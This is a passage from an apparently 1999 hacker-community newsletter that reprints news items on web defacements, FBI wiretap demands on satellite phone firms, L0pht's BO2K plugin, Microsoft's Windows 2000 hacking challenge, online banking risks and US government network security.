one of the most valuable resources we have in computer
security world," Schneier said. Marcus' "association with
the L0pht recognizes that there is considerable expertise
in the hacking community that can be leveraged in the
fight against computer crime. Marcus is just smarter than
other people, because he realized it and figured out how
to use it No kidding; he's that good."
So you do the math: self appointed cybervigilante John
Vranesevich, with his stolen "Israeli" atomic secrets
written in Bengali, changed medical records that weren't
changed, unsubstantiated relationships with NASA and
DISA (and that's just for openers), and, on the other
hand, Marcus Ranum and people like Cheswick, Bellovin,
and Schneier.
The best way to deal with "Denunciator" virus is simply
silence; don't feed the hype.
========================================
EDITOR'S NOTE: CyberWire Dispatch, with an Internet
circulation estimated at more than [500,000], is now
developing plans for a once-a-week e-mail publication.
Every week, one of five well-known investigative reporters
will file for CWD. If you think your company or organization
would be interested in more information about establishing
an sponsorship relationship with CyberWire Dispatch,
please contact Lewis Z. Koch at lzkoch@wwa.com.
===================
To subscribe to CWD, send a message to:
Majordomo@vorlon.mit.edu
No subject needed.
In the first line of the message put:
Subscribe CWD
To remove yourself from this list, send a mesasge to:
Majordomo@vorlon.mit.edu
No subject needed.
In the first line of the message put:
Unsubscribe CWD
----
@HWA
15.0 High Profile Sites Defaced
~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by TurTleX
The Jerry Springer Show, Symantec Corporation and
even Nellis Air Force Base have all had their pages
defaced in recent days. The defaced Symantec page
claimed to have left a trojan/worm behind that infected
all of Symantec's systems. Symantec denies the charge.
Thanks to attrition.org we were able to grab mirrors of
the effected sites.
HNN Cracked Pages Archive
http://www.hackernews.com/archive/crackarch.html
BBC
http://news.bbc.co.uk/hi/english/sci/tech/newsid_409000/409980.stm
C | Net
http://www.techweb.com/wire/story/TWB19990802S0002
Wired
http://www.wired.com/news/news/technology/story/21052.html
ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2307804,00.html
Heise Online- German
http://www.heise.de/newsticker/data/fr-02.08.99-001/
ZDNet;
--------------------------------------------------------------
This story was printed from ZDNN,
located at http://www.zdnet.com/zdnn.
--------------------------------------------------------------
Symantec: Vandals didn't infect us
By Robert Lemos, ZDNN
August 2, 1999 2:02 PM PT
URL: http://www.zdnet.com/zdnn/stories/news/0,4586,2307804,00.html
Internet vandals broke into the servers of network security and utilities firm Symantec Corp.
Monday morning, defacing the company's Web site.
While the vandals claimed to have infected Symantec's network two months ago with a worm,
quaintly dubbed Bloworm, the company denied Monday that any worm existed on its systems.
"There is no virus infection, no worm infection, and no danger to customers," said Richard
Saunders, a spokesman for the Cupertino, Calif., company.
"They didn't get in beyond posting a mildly offensive, but otherwise impotent, message on our
home page."
The five cyber vandals, who identified themselves only by their handles, claimed otherwise. "0ur
w0rm iz spreading around (Symantec's) netw0rk and infecting (it's) f1lez, since about 2 months
ago. phear," stated the group in a document of typically spelling-impaired hacker-speak. The
document was left behind by the group after it broke into the servers of Symantec at about 5 a.m.
PT Monday.
Worms are virus-like programs that infect systems through networks automatically and without the
need for an unknowing user to open a file or run an application.
Symantec (Nasdaq:SYMC) has always been a popular target for Internet vandals looking for a
hard nut to crack. The only difference: This time someone actually got in.
"What this incident does show is that you cannot be complacent towards this kind of threat," said
Saunders. The Symantec spokesman could not detail how the cyber vandals entered the
company's network.
Symantec engineers took down the page within an hour of its posting, but not before the media in
Europe got wind of the defacement. The BBC posted a story early Monday morning.
@HWA
16.0 Off The Hook Goes Shortwave
~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Emmanuel
Adding to its impressive list of distribution methods "Off
the Hook" now broadcasts on shortwave radio. "Off the
Hook" is a weekly radio show dedicated to the issues
and events of the hacker world. Not only is "Off The
Hook" available via commercial broadcast radio, Real
Audio and MP3, they will now be broadcasting on
shortwave radio as well. You can listen in at 7415khz,
Tuesdays at 8 pm EST.
Off The Hook
http://www.2600.com/offthehook/
@HWA
17.0 Feds Stop Satellite Biz due to WireTaps
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Code Kid
The Federal Communications Commission is holding up
critical operating licenses for several small satellite
phone companies until they have finished talking with
the FBI. The CALEA Act passed in 1994 requires
telephone companies to provide law enforcement with
access to digital call information, including the ability to
tap calls and determine the location of users. Several
satellite phone companies are in long negotions with the
FBI to ensure that their systems comply with the law.
C | Net
http://www.news.com/News/Item/0,4,40048,00.html?st.ne.fd.gif.e
FBI wiretap worries slow satellite phones
By John Borland
Staff Writer, CNET News.com
August 3, 1999, 4 a.m. PT
URL: http://www.news.com/News/Item/0,4,40048,00.html
The Federal Bureau of Investigation is putting the brakes--at least temporarily--on the satellite phone industry.
The FBI and other U.S. law enforcement agencies are worried that new space-based telephone systems, which theoretically allow a person to use a wireless phone
from virtually anywhere on earth, will undermine their ability to wiretap telephone calls and trace criminals through cellphones.
Federal communications officials are holding up critical operating licenses for Globalstar and a handful of smaller satellite phone services while they negotiate with the
FBI over wiretapping issues.
"These are borderless systems," said Mac Jeffery, a spokesman for Globalstar, a satellite phone provider scheduled to launch service in North America by the end of
this year. "But it's not really a borderless world from the legal perspective yet."
Globalstar, Iridium, and a handful of other companies are leading an ambitious push to create a network of satellites that compete with traditional cellular phone
service. The industry has already run into growing pains--Iridium, the first and largest system to launch, has run into severe financial difficulties after falling short of
subscriber goals.
The wiretapping issue affects these companies and a handful of other non U.S.-based smaller satellite phone providers which are seeking licenses to operate in the
United States, but have land-based equipment located in Canada.
A 1994 U.S. law, dubbed the Communications Assistance for Law Enforcement Act (CALEA), requires telephone companies to provide law enforcement with
access to digital call information, including the ability to tap calls and determine the location of users.
That law has proven controversial. Privacy rights groups have protested that the FBI is encroaching on citizens' rights in their push to tap phone calls. Meanwhile, the
FBI has said that industry proposals for following the law don't go far enough. The Federal Communications Commission has yet to make a final ruling on the laws.
The FBI's concerns with satellite phone providers do include figuring out how they fit into this law's framework, said one department official. But the Bureau's
concerns are larger and more immediate, which has led to the current delay in licensing the services.
Some of these satellite systems are unable to provide information on a caller's location. This information is critical for law enforcement, the FBI says, so it can know
whether or not it can legally seek a U.S. court order to tap the phone calls.
Canada's TMI Communications, which has seen its U.S. license application languish in the FCC for close to 16 months, faces this objection. Department of Justice
officials are reportedly asking the company to include some kind of global positioning system in TMI phones that would at least determine which country a caller was
in.
TMI executives confirmed that they are discussing possible ways to solve the dilemma with U.S. law enforcement officials, but would not comment further.
Because its system is configured differently, Globalstar doesn't face this issue. But because it wants to set up two of its four land-based receiving stations in Canada,
it is in a different--and perhaps more technically challenging--situation.
The FBI is concerned that it would have to go through Canadian government officials to win a wiretap on any calls going through these stations--an idea it strongly
opposes. Allowing information about surveillance operations to go through foreign government channels would be a serious violation of national security, one FBI
official said.
All the companies involved are negotiating these issues with the FBI, and have each proposed a series of technical and policy solutions to the problem unique to their
own networks. But according to Washington sources, senior trade and law enforcement officials from Canada and the United States have also discussed the
problem, with an eye to settling national security concerns on a policy level with a minimum impact on industry development.
Meanwhile, the FCC is waiting and watching. The FBI and the Department of Justice have no official power to hold up the companies' operating licenses, but
regulators are waiting for a resolution to the talks anyway.
"The parties are discussing this," said one FCC official, who asked to remain anonymous. "In the absence of indications that this is not moving forward, we would
like to give that process a chance to work."
The dispute is similar to the fight being waged by U.S. software companies, who are barred from exporting strong encryption programs overseas. The FBI has
lobbied to bar these exports--and has advocated for stricter rules governing use of encryption inside the United States--arguing that law enforcement needs to be
able to crack encryption on encoded email messages of criminals and terrorists.
As with the software companies, the satellite firms are taking a conciliatory stance, hoping to get federal approval before the issue begins cutting into their official
launch date. Globalstar, which is slated to go live in North America by the end of this year, says it doesn't expect the issue to push that date back.
"Obviously some modifications are going to be made in order to make sure that national security is intact," said Andy Radlow, a spokesman for Vodafone AirTouch,
the company handling Globalstar's North American business. "But we don't foresee launch delays."
@HWA
18.0 InfoCriminals Should Face Reasonable Penalties
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Weld Pond
A very interesting opinion piece in Sunday's San Jose
Mercury News asks some very poignant questions. The
article calls for reasonable sentences for InfoCriminals,
methods to be developed so that they are caught and
says that companies should be held just as responsible
as InfoCriminals for security violations. (This is the first
time I have seen the word "InfoCriminals" used. I like
it.)
San Jose Mercury Mews
http://www7.mercurycenter.com/premium/business/docs/hotbutton01.htm
Published Sunday, August 1, 1999, in the San Jose Mercury News
Companies should be required
to have their information
security systems audited on a
regular basis, says
Steph Marr, vice president of Predictive Systems Inc.'s information
security practice in Santa Cruz.
Setting the trap for hackers
A truly rational criminal system would provide
near-certainty that transgressors would be caught -- and
punish companies with lax security
BY STEPH MARR
THE recent spate of viruses has put us back on red alert -- the bad
boys are still out there. And if they're caught, like David L. Smith, the
alleged father of ``Melissa,'' they may face ridiculously high penalties
-- penalties that are way out of line with their actual threat to society.
However, these penalties are necessary in order to establish some
semblance of deterrence, because the probability of getting caught is
near zero. We need to increase that probability.
Here's a formula that explains why we seem unable to stop hackers
and other computer criminals: The value of a crime equals the penalty
times the risk of getting caught.
The concept is simple. If the value of the ``prize'' is higher than the
penalty multiplied by the risk of getting caught, most hackers will go
for it. For example, if a hacker breaks into a bank's server and steals
$1 million and the penalty for the crime is 10 years, it's worth it if the
risk of getting caught is near zero. You do the math.
A truly rational criminal system would provide near-certainty that
transgressors would be caught. When caught, they would receive a
penalty that is precisely commensurate with their crime.
For example, if a hacker breaks into a bank's computer and steals $1
million, that's bank robbery. There are currently laws that address
bank robbery and the penalties that apply. Similarly, if hacking occurs
over state lines, wouldn't that constitute interstate transportation of
stolen property? My point is that rather than apply grossly overstated
penalties to an InfoCrime, we should simply apply the penalties
already established for ``real world'' parallels.
But this only works if the criminals are likely to be caught -- which is
not where we are today. In recent years, few InfoCriminals have been
caught and punished. To address this, we need responsible parties --
such as the government, private institutions and computer vendors --
to introduce greater risk into the hacker equation.
The first step would be to encourage better record keeping of who
does what, and when. For example, handling virus problems could be
comparatively easy if we refused to run ``anonymous'' programs.
Microsoft has built this ability into its browser, as have others. It's a
simple matter to set the system to refuse to run code that doesn't have
a known source.
Furthermore, we need to foster a system whereby critical information,
such as medical or financial records, simply cannot be accessed
without a clear record of precisely who did what and when.
This is the responsibility of the medical or the financial communities.
We need legislation to require these organizations to take strong
measures to protect information kept about us, or for us. Some
information may be collected as a normal part of transacting business
with any organization, but limits on the use of that information need to
be in place.
It is the responsibility of businesses and institutions to safeguard the
information we give them. If they fail to do so, they should be
penalized, along with the hackers. If a high-school student can crack
the Pentagon, then both the student and the Pentagon should be held
accountable. If the Pentagon can't defend against our own students,
how are they ever going to stand up to a true InfoWar from a foreign
government?
Companies should be required to have their information security
systems audited on a regular basis, just as they have their books
audited. And, just as incorrect bookkeeping can lead to civil and
criminal penalties, so too should information security errors.
For example, if it can be proved that a company could easily have
done a better job of security, the company itself -- in addition, of
course, to the hacker -- should be punished. Fines could be collected
from the company to compensate those people whose information
was lost or stolen. This is the only way we can make information
security -- and the safety of our private information -- a standard
business practice.
We need the vendors of consumer products to be held accountable
for the products they create. If Intuit is going to be in the business of
selling consumer financial management software, it should be
responsible for building in the safeguards and the protections that are
appropriate for that information. If Microsoft is going to be in the
business of selling consumer operating systems, it should be
responsible for providing an environment which is robust, free from
known defects and protects consumer information, by default. Users
should be free to accept additional risks, but it should be informed
consent.
Responsible software and responsible institutions would eliminate
hacking without risk. Then we can move on to creating realistic
penalties for InfoCrimes.
@HWA
19.0 L0pht Professional Plugin Pack For BO2K
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Megan A. Haquer
L0pht Heavy Industries has announced that they are
developing a line of professional plugins for the robust
remote administration tool BO2K. The first of these
plugins BOTOOL was released yesterday. BOTOOL allows
the administrator to remotely manage files and the
remote registry. This allows you to upload and download
files securely, as well as copy, rename and delete files
and directories. The remote registry editor allows you
full registry editing capabilities over the BO2K secure
command channel.
L0pht Heavy Industries
http://www.l0pht.com/
--------------------------------------------------------------
This story was printed from ZDNN,
located at http://www.zdnet.com/zdnn.
--------------------------------------------------------------
L0pht releases first BO2K plug-in
By Robert Lemos, ZDNN
August 4, 1999 2:38 PM PT
URL: http://www.zdnet.com/zdnn/stories/news/0,4586,2309393,00.html
The controversial Back Orifice 2000 has some company.
On Tuesday, the white-hat hacking think-tank L0pht Heavy Industries posted its first of
three plug-ins for the program, which has been alternately called a remote administration
application or a hacking tool, depending on the user's point of view.
Called BOTOOL, the program allows users to perform point-and-click file transfers and
registry editing. The L0pht intends to release at least two more plug-ins: BOPEEP and BOSCRIPT.
Back Orifice (BO2K), whose name spoofs that of Microsoft Corp.'s (Nasdaq:MSFT) Back Office,
originally hit the Internet last year when the Cult of the Dead Cow, a less virginal hacking
group, announced the program at the hacking confab known as DEF CON.
Last month, the Cult of the Dead Cow followed up with an upgraded version known as BO2K,
which had racked up 128,776 app downloads as of July 22. Once the "server" part of the
program is installed on a target PC, a user -- or hacker -- can remotely control that PC through
the Internet using the "client" program.
The program runs on Windows 95/98, NT and 2000 and uses encryption to secure client-server
communications.
Internet security firms and Microsoft have called the program malicious and have posted security
warnings about it.
@HWA
20.0 MS Wants Free Publicity
~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
found on slashdot
In an obvious ploy to get free publicity Microsoft has
set up a Windows 2000 machine on the internet and
invited people to break in. Microsoft wants to create
the most secure version of Windows ever, which is a
laudable goal. It is hoped that this is not a primary
testing method. Not only is attacking a system blind
over the net probably one the hardest things to do but
the people who could actually accomplish this task have
more important things to do other than testing Microsoft
products for free. Of course a few months from now I'm
sure we will hear how Windows 2000 stood up to X
number of 'hack' attempts via the internet and is now
the most secure version of Windows ever. Phalease.
http://www.windows2000test.com/ <- hack me
20.1 MS: a crashed site is hard to hack!
----------------------------------
This story was printed from Sm@rt Reseller,
located at http://www.zdnet.com/sr.
--------------------------------------------------------------
Microsoft to Hackers: Crack This!
By David Raikow, Sm@rt Reseller
August 4, 1999 3:24 PM PT
URL: http://www.zdnet.com/sr/stories/news/0,4538,2309474,00.html
In an attempt to burnish its tarnished reputation for network security, Microsoft issued an open
challenge on Tuesday to the hacking community. But potential testers barely got a chance to
attempt to break Windows 2000�s security system, as the test server Microsoft offered crashed
and stayed down for most of the past 24 hours.
Microsoft placed a web server running the latest beta of Windows 2000 and Internet Information
Server (IIS) outside its firewalls, and invited the public to go after target files and user accounts it
placed there. The company�s reason for doing so? "We hope that this kind of open testing will
allow us to ship our most secure OS yet," said a Microsoft spokesperson.
The hacking community was and is largely unimpressed, however. In its posted coverage, the
Hacker News Network called the challenge "an obvious ploy to get free publicity...It is hoped that
this is not a primary testing method."
Members of the Linux-enthusiast site Slashdot for the most part concurred, accusing Microsoft of
using anti-Microsoft sentiment for free auditing.
Meanwhile, the Linux community created a counter-challenge of its own. Tuesday afternoon,
LinuxPPC, the developers and distributors of a PowerPC-native version of Linux, challenged
hackers to crack one of its servers. Unlike Microsoft, which did not offer any kind of incentive or
award to hackers, LinuxPPC is giving the machine to the first person to break in.
Whoops!
If it was meant as a publicity stunt, the Microsoft security challenge may have backfired. As soon
as the site went online, Microsoft ran into technical difficulties with the test server. Early visitors
reported problems with the home-page HTML and Javascript, some serious enough to prevent
them accessing the page at all. Posted status logs indicate that the server had to be rebooted at
least once because the system log was full, and some services were unavailable at reboot.
Most significantly, the server was offline for most of Tuesday due to what Microsoft described as
"router problems". Though intermittently available Wednesday morning, the site was down at press
time, and appears to have been pulled from DNS servers entirely; ping tests indicated the MS
router was functional. Some Slashdot contributors reported seeing a notice that the site had been
withdrawn, but no such notice is currently posted on any publicly accessible MS server.
A Microsoft spokesperson attributed some of the difficulties to thunderstorms in Seattle on
Tuesday, but had no comment on the site's status at press time.
@HWA
21.0 China Seeks to Develop Infowar Capabilities
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Code Kid
A Chinese military newspaper covering the activities of
China's Peoples Liberation Army has called for the
recruitment of 'civilian hackers' and for the training of
'cyber warriors' at Army schools.
Internet News
http://www.internetnews.com/intl-news/article/0,1087,6_173341,00.html
Chinese Military Seeks to Train Cyber Warriors
August 3, 1999
Hans Lombardo, Managing Editor, asia.internet.com
International News Archives
[Hong Kong, CHINA] The Chinese military hopes to develop the capability of
engaging in warfare over the Internet by training hackers to take the battle online.
The Liberation Army Daily (LAD), a mouthpiece of China's Peoples Liberation
Army (PLA), recently called for the development of this capability. The paper said
that, by recruiting civilian hackers and training "cyber warriors" at Army schools,
China could be prepared for an Internet war.
The call was made in response to several hacking incidents in the US and China
after NATO's bombing of the China's Belgrade Embassy. The Army paper
reported that a "battle" was fought on the Internet between US and Chinese
hackers.
In May, Chinese hackers infiltrated various US government sites including the
Department of Energy (DOE), the Department of the Interior (DOI), the US
Embassy in China, and the Naval Communications Command. Nearly a thousand
US civilian sites were broken into in the two days following the bombing, sources
said.
According to the Chinese military paper, US hackers responded by
"counterattacking" several civilian sites in China.
More recently, the Chinese government has been accused of waging a cyber war
against the outlawed Chinese sect, Falun Gong. Webmasters in Canada, the US,
and the UK have reported that their sites, hosting or linking to the sect's sites, were
sabotaged or brought down by hackers traced to Chinese domains.
In addition to this, Beijing has moved its rhetorical campaign against the sect on to
the Web. The China Internet Information Center and The China Daily have set up
anti-Falun Gong sites.
Copyright 1999 internet.com Corp.
All Rights Reserved. Legal Notices, Reprints.
@HWA
22.0 Online Banking Still Risky Congress Says
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Inf0rmant
Over 6 million Americans use the internet to do their
banking, pay bills, transfer money, apply for loans, etc.
A new report released by the General Accounting Office
examined 81 financial institutions and found that 35 of
them, about 44 percent, had not taken all the
risk-limiting steps regulators had recommended.
Unfortunately the report did not examine the client side
security of internet banking. With programs like NetBus
and BO2K floating around that is where the real danger
lies.
Nando Times
http://www.nandotimes.com/technology/story/body/0,1634,77392-122285-862902-0,00.html
Many banking firms' online options still risky, GAO says
Copyright � 1999 Nando Media
Copyright � 1999 Associated Press
By MARCY GORDON
WASHINGTON (August 3, 1999 10:57 a.m. EDT http://www.nandotimes.com) - Internet banking carries more risk than the traditional bricks-and-mortar
variety, yet 44 percent of the financial institutions in a survey hadn't taken all the steps deemed necessary to limit risks, congressional
investigators said in a new report.
The number of banks, thrifts and credit unions offering Internet banking has nearly tripled over the past year, and more than 6 million Americans go
online to transfer money between accounts, pay bills, check account or investment balances and apply for loans.
Some lawmakers are concerned about the safety and security of online banking and the possibility that consumers could lose money or have their
financial privacy breached by hackers.
"The American banking system has proven capable of providing full security and privacy," said Rep. Spencer Bachus, R-Ala., chairman of the House
Banking subcommittee on monetary policy. "Our challenge is making sure the current rush to technology does not outpace that proven ability."
The new report by the General Accounting Office, Congress' investigative arm, concludes that Internet banking is by nature riskier than
conventional banking. The GAO's review of banking regulators' examinations of 81 financial institutions found that 35 of them, about 44 percent,
hadn't taken all the risk-limiting steps regulators have said are needed.
The report was being released Tuesday at a hearing of Bachus's subcommittee.
It found, for example, that the boards of directors of some financial institutions had failed to approve strategic plans for Internet banking, and some
institutions lacked policies and procedures covering online operations.
The report noted that despite these deficiencies, the review - conducted from April 1998 to May 1999 - didn't turn up any financial losses or
security breaches in online banking. However, the GAO auditors said, the sample of bank examinations reviewed was too small to support strong
conclusions about the banking industry.
Relatively few examinations have been conducted because Internet banking is fairly new and examiners have focused on the banking industry's
efforts to solve the Year 2000 computer problem, the GAO said.
In a related development, federal regulators reported Monday that 99 percent of the nation's federally insured banks, thrifts and credit unions have
successfully completed preparations for the millennial date change.
Many major U.S. banks now offer Internet banking, supplementing their traditional branch services. In addition, there has been a recent push
toward virtual, branchless banking, with online brokerage firm ETrade acquiring Telebanc Financial for $1.6 billion and Bank One launching
WingspanBank.com.
Yet, even with the explosive growth of electronic commerce and online investing, most consumers are still somewhat hesitant about conducting
financial transactions on the Internet, and even more so when it comes to managing their finances.
According to a June report by investment firm Goldman Sachs, only as many as 4 percent of U.S. households currently use online banking products.
That number is expected to jump to about 20 percent by 2002.
@HWA
23.0 NIPRNet Access Restricted
~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by evilwench
A directive to eliminate unauthorized access to the
Non-Classified IP Router Network will soon be issued
from The Office of the Secretary of Defense. DOD is
cracking down on unofficial connections to NIPRNet in
an effort to increase security.
Government Computer News
http://www.gcn.com/vol18_no24/news/351-1.html
August 2, 1999
DOD will crack down on access to Niprnet
By Bill Murray
GCN Staff
The Office of the Secretary of Defense soon will issue a directive to eliminate
unauthorized back-door access to the Non-Classified IP Router Network.
�It�s being worked on right now,� said Air Force Maj. Gen. John H. Campbell, vice
director of the Defense Information Systems Agency, who spoke at length
recently about much of the work on DISA�s plate.
�Unless you have a waiver with a specific reason,� Defense Department agencies
will not be allowed to maintain these unapproved links, Campbell said in a recent
interview.
It�s unofficial.
DOD officials are cracking down on unofficial connections to improve security, he
said. �The NIPRnet grew up around convenience, not security,� Campbell said.
With electronic commerce, logistics and other business processes heavily reliant on the Internet, DISA
officials are using eight official NIPRnet gateways to improve access, Campbell said.
Meanwhile, regarding the Defense Information Infrastructure�s Common Operating Environment, senior
DOD brass recently reaffirmed their support for the DISA-run interoperability effort, Campbell said.
The department�s work on developing an enterprisewide systems plan, known as the Global Network
Information Enterprise initiative, will not eliminate DII COE, he said, echoing comments made recently
by Marvin Langston, DOD�s deputy chief information officer [GCN, May 10, Page 1].
Campbell said DOD officials are also pleased with the progress of Defense Message System
installations. More than 210 sites worldwide use it, he said. Organizational use doubled during the past
two months, while AUTODIN use decreased, Campbell said.
DISA�s Joint Interoperability Test Command is testing DMS Release 2.1, Campbell said.
�The directories and infrastructure are stable and responsive,� he said. Message exchange, delivery,
speed of service and other critical performance measures �appear to be doing well,� he said.
DISA is planning several pilots later this year in support of medium-grade messaging, a managed
commercial e-mail service targeted at users who do not need command and control capabilities,
Campbell said. Medium-grade messaging will use DOD public-key infrastructure software certificates,
he said.
Campbell also praised the way DOD handled the Melissa virus. He said the department�s systems
defense team worked with software vendors to ensure software patches were available for DOD users to
download within six hours of the first reports of the outbreak.
�By midnight, both patches worked, and they were posted on a Web site,� said Campbell, who is
commander of the department�s Joint Task Force for Computer Network Defense. Campbell said he was
paged about the first DOD Melissa infections at 6:30 p.m. on March 26.
The department�s Computer Emergency Response Center officials from each service asked
organizations to post banners on their networks asking users not to open e-mail messages with subject
headers reading �important message from,� even if they knew the sender.
CERC has primary, day-to-day interaction with DOD organizations, Campbell said, and it reports to the
task force, which is primarily concerned with organized attacks on Defense systems.
For example, no such attacks materialized during Operation Allied Force, Campbell said. �There was
quite a bit of hacker activity from Serbia, but by and large it falls into the nuisance category,� such as
defacing Web sites, he said.
Network Associates Inc. of Santa Clara, Calif., and Symantec Corp. of Cupertino, Calif., the companies
that produced the patches for Melissa, hold antivirus software licenses with DISA.
Campbell said DISA officials have committed to giving the task force $3.2 million in fiscal 2000.
@HWA
24.0 Gov Employees Personal Privacy at Risk
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Sarge
Information stored on the National Finance Center's
computer systems, including sensitive government
personnel and financial information, is at risk of
disclosure or destruction. The GAO report found that
the NFC, under the Agriculture Department's control,
had given legitimate users too much access. The NFC
said it has completed some corrective actions and is
working on the rest.
Federal Computer Week
http://www.fcw.com:80/pubs/fcw/1999/0802/web-nfc-8-3-99.html
AUGUST 3, 1999 . . . 13:20 EDT
GAO finds security lax for federal employees'
personal info
BY COLLEEN O'HARA (ohara@fcw.com)
Weak access controls are placing sensitive government personnel and
financial information stored on the National Finance Center's computer
systems at risk of disclosure or destruction, according to a new General
Accounting Office report.
The Agriculture Department's NFC operates financial systems such as
payroll/personnel and accounting systems for the USDA and about 60 other
federal organizations. The NFC also maintains the records of the multibillion
dollar Thrift Savings Program, a type of 401(k) program for federal
employees.
The GAO concluded that problems with NFC's access control "placed
sensitive personnel information at risk of disclosure, critical financial operations
at risk of disruption and assets at risk of loss." Logical, system software and
physical access controls are designed to protect computer databases from
enabling unauthorized users to access or change the data stored in the
systems.
The GAO found that NFC had given legitimate users too much access to
financial and sensitive personal information. For example, GAO found that 86
users had the ability to read and alter any data stored on tape regardless of
other security software controls that were in place. NFC said they have taken
steps to limit this access, according to the report.
In addition, GAO found that users could bypass certain access controls and
gain unauthorized access to financial and other sensitive data that the NFC
maintains or cause system failures. For example, the system software that
controls batch processing allowed any user with the ability to execute a batch
program also to shut down the system or turn off features such as the security
software.
In its response to the report, the NFC said it has "already completed
corrective actions on most of the items and [it has] planned appropriate
corrective actions on the rest."
@HWA
25.0 Other Security Challenges Offered
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
contributed by Space Rogue
Yesterday Microsoft placed a Windows 2000 machine
outside of its firewall and asked people to break into it.
Today the folks at LinuxPPC have issued a similar
challenge except they are offering the machine itself to
the person who breaks in while Microsoft has not
offered any incentive. The Microsoft site was down
most of the day yesterday and the LinuxPPC site was
unreachable this morning when we attempted to check
it. Companies need to realize that these "Hacker
Challenges" are not valid testing methods and are
nothing more than publicity stunts. If you want a valid
security assessment then spend the money and hire an
independent third party to review your product.
Windows 2000 Test
http://www.windows2000.com
Linux PPC
http://crack.linuxppc.org/
ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2309474,00.html
See also a previous article in the HNN Buffer Overflow
section
The Hacker Challenge
http://www.hackernews.com/orig/chall.html
Reprinted below from an earlier version of HHN
The Hacker Challenge
By: Qubik (qubik@bikkel.com)
You have probably read about them and some of you may
have even participated in one or two. Hacker challenges;
where your asked to bypass the latest security measure
implemented into technology which is already, prior to
testing, dubbed as the latest in computer protection. But
for what in return? Most challenges offer a reward of some
sorts, a reward which is more often than not, a five or six
figure with a dollar sign placed neatly at the beginning.
So just what is the deal with these challenges? What
purpose do they really serve and are they just marketing
ploys?
I'd like you to imagine for a moment that you're an
administrator of a small corporate network. It's not the
most exciting of jobs, and you don't have time to keep up
with the latest going ons in the security scene. Your
network has been attacked a few times before, and you
start to think about upgrading your security. So where do
you start?
Where else would you start, but the internet? It's the
worlds largest resource, and every good company dealing
with network security, is bound to be on the internet
somewhere. So you use a search engine or two and you
come across a web site for a new state of the art firewall,
who's manufacturers claim it resisted every hacker that
attempted to hack it at a recent hacker convention. Your
amazed, surely their high price tag is nothing for complete
security!?
Only what if it is all a clever ploy, haven't you got to ask
yourself just how many people actually tried to hack into
that particular piece of software? Haven't you got to look
into the reputation of the manufacturer? Of course you
do! To be sure, you've got to ask for the cold hard facts,
not the marketing babble!
There are serious flaws in many hacker challenges, not
the least being that most 'real' hackers only hear about
them after they've finished. This makes you wonder just
who took part, and how they found out about it.
It's not uncommon for hackers and security analysts to
earn wages in excess of six figures, and to earn such
wages, you've got to be either very lucky, or very busy.
So what's your guarantee that a hacker who actually
knows what he is doing, actually took the time out to earn
a, comparatively, small ten thousand? You have no
guarantee at all, why on earth should he or she bother?
Next ask yourself whether real hackers would want to find
all those bugs in that new technological innovation. Surely
their only going to end up making their job, of hacking,
harder by pointing them out?
However, A low level source code analysis of a piece of
software or a close look at hardware by reputable third
party security analysis company will delay product ship
times and cost a lot more than setting up a hacker
challenge. Not to mention that it has nowhere near the
same marketing punch. Display your product at an
upcoming convention and let people bang on it for a
weekend and then claim "Product X survives Hacker
Challenge." Makes a great press release.
It all seems rather corrupt, with companies hiding the
truth and rubbing their hands at the millions they make. A
ten thousand dollar reward seems rather pathetic, when
your earning ten times that kind of money. Surely these
companies know this, are they in fact attempting to social
engineer the hackers or maybe worse their customers?
But it's not all like that, there are plenty of genuine
challenges out there. Some have been set up to test
software and, now more and more, hardware, others
testing entire networks. For example, recently the Quebec
government is enlisting the aid of hackers to test its
networks and to research new ways of protecting those
networks.
So what can we say about hacker challenges? Do they
really prove how secure a product is? I don't think so, the
fact that most aren't officially announced to the hacker
public and that they are often deliberately misinterpret,
doesn't give a good impression. But then, who should a
company go to? It's not the easiest of tasks in the world,
to announce such a challenge.
Hack at your own discretion, don't be afraid to take part
in a hacker challenge, but don't take the word of the
manufacturer, when they say it's secure, just because a
few passers by a convention typed a few keys on a
keyboard. There will always be flaws in hardware and
software, it's up to us to the true hacker to find and fix
them, whether we do it for the companies maketing
campaign, or for personal gratification.
@HWA
25.1 Software developer offers hacker challenge
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://technology.news.com.au/techno/4108922.htm
Developer issues hacker challenge
By JENNIFER FORESHEW
3aug99
A SMALL Sydney company that has developed software designed to
make Web sites hack-proof, has thrown out a challenge to crack the
technology.
Creative Digital Technology (CDT) has developed software which, when
downloaded, makes a site secure.
"We are prepared to stand behind that financially by offering a prize to
universities to see if they can do what our developers haven't been
able to do," CDT chief operating officer Philip Burton said.
CDT, which developed the country's first SET (Secure Electronic
Transaction) enabled products, is launching the SecurePage product at
Internet World 99 this week.
"We can protect any Web site," CDT chief executive Bahram Boutorabi
said. "The first version of the product runs on Microsoft's Internet
Information Server platform, but we are planning to roll out across all
platforms."
Mr Boutorabi, who is also technology officer, said many sites could be
hacked because they were developed using mostly straight text.
"We have developed the technology to put something into Active
Server Pages, HTML, Net Commerce Mark-up Language and XML, which
represents a signature that someone has made against that page," Mr
Boutorabi said.
Any attempt to alter a Web site's content would result in action being
taken by the system, which is protected by 192-bit, Triple-DES
encryption.
"If the contents of that page have been altered for any reason it will
stop serving that content out and serve it from its own content area,
where everything is fully encrypted," Mr Boutorabi said.
"SecurePage enables an administrator to put a disc into the system, run
the administration and tell it to sign all of the pages with their
password.
